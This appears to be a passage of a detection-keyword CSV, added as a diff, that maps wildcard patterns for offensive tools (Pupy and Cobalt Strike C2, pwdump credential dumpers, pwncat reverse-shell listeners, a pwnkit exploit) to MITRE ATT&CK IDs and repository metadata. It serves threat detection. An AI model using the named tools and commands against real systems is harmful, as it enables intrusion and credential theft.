+"*PupyCredentials.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*PupyDnsCnc.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*PupyDnsCommandServerHandler*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*pupygen.py *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*PupyKCPSocketStream*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*PupyLoaderTemplate.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*PupyOffloadDNS*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*PupyOffloadSocket*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*PupySocketStream.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*PupyVirtualStream.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*pureqh/bypassAV*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pureqh/bypassAV","1","1","N/A","10","10","434","101","2021-05-18T05:03:03Z","2021-02-25T05:26:11Z"
+"*purevpn_cred_collector.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*purplepanda.py*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z"
+"*purplepanda_config.py*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. 
Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z"
+"*purplepanda_github.py*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z"
+"*PURPLEPANDA_NEO4J_URL=*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z"
+"*purplepanda_prints.py*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. 
Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z"
+"*PURPLEPANDA_PWD=*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z"
+"*PurpleSharp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*putterpanda_whoami*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*puttygen.exe FUZZ*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z"
+"*puzzlepeaches/NTLMRecon*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z"
+"*PWCrack*","offensive_tool_keyword","PWCrack","cracking tool for multiple hash type","T1110 - T1111 - T1210 - T1558.002 - T1555","TA0006 - TA0005","N/A","N/A","Credential 
Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","5","456","57","2023-09-27T08:26:21Z","2018-07-01T08:33:55Z"
+"*pwd*/*/rules/best64.rule*","offensive_tool_keyword","AD exploitation cheat sheet","Crack the hash with Hashcat","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*pwd_dump *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*PWDump *","signature_keyword","Antivirus Signature","Antivirus signature - a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems","N/A","N/A","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*PWDump.*","offensive_tool_keyword","pwdump","a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. 
This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems","T1003 - T1027 - T1055 - T1056 - T1059 - T1078 - T1087 - T1098 - T1110 - T1212 - T1547","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://ftp.samba.org/pub/samba/pwdump/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*pwdump.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*-PWDumpFormat*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*pw-inspector -*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
+"*pw-inspector.*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
+"*pwn_jenkins*","offensive_tool_keyword","pwn_jenkins","Remote Code Execution for jenkins","T1216 - T1210 - 
T1573","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gquere/pwn_jenkins","1","0","N/A","N/A","10","1681","298","2023-03-09T09:16:14Z","2018-07-18T14:24:27Z"
+"*pwn1sher/CS-BOFs*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z"
+"*pwn1sher/WMEye*","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z"
+"*pwn3d_label = Pwn3d!*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - 
T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*pwnagotchi*","offensive_tool_keyword","pwnagotchi","Pwnagotchi is an A2C-based AI leveraging bettercap that learns from its surrounding WiFi environment to maximize the crackable WPA key material it captures (either passively. or by performing authentication and association attacks). This material is collected as PCAP files containing any form of handshake supported by hashcat. including PMKIDs. full and half WPA handshakes","T1562.004 - T1040 - T1557.001","TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/evilsocket/pwnagotchi","1","0","N/A","N/A","10","6219","976","2023-07-25T00:15:21Z","2019-09-19T13:07:15Z"
+"*pwnat.exe*","offensive_tool_keyword","pwnat","pwnat. by Samy Kamkar. is a tool that allows any client behind a NAT to communicate with a server behind a separate NAT with *no* port forwarding and *no* DMZ setup on any routers in order to directly communicate with each other. Simply put. this is a proxy server that works behind a NAT. 
even when the client is also behind a NAT","T1584 - T1571 - T1210.001","TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/samyk/pwnat","1","0","N/A","N/A","10","2861","456","2023-08-08T05:09:00Z","2012-08-10T05:55:11Z"
+"*pwncat-cs *:*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*pwncat-cs -lp *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*pwncat-cs ssh://*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*pwndb --target @* --output *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*pwndrop install*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service 
for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z"
+"*pwndrop start*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z"
+"*pwndrop status*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z"
+"*pwndrop stop*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z"
+"*pwndrop-linux-amd64*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z"
+"*pwndrop-master*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red 
teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z"
+"*pwned_x64/notepad.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Pwned-creds_Domainpasswordspray.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*pwnedornot.py -d *","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*pwned-passwords-ntlm*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. 
It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z"
+"*pwnkit *","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","1","97","16","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z"
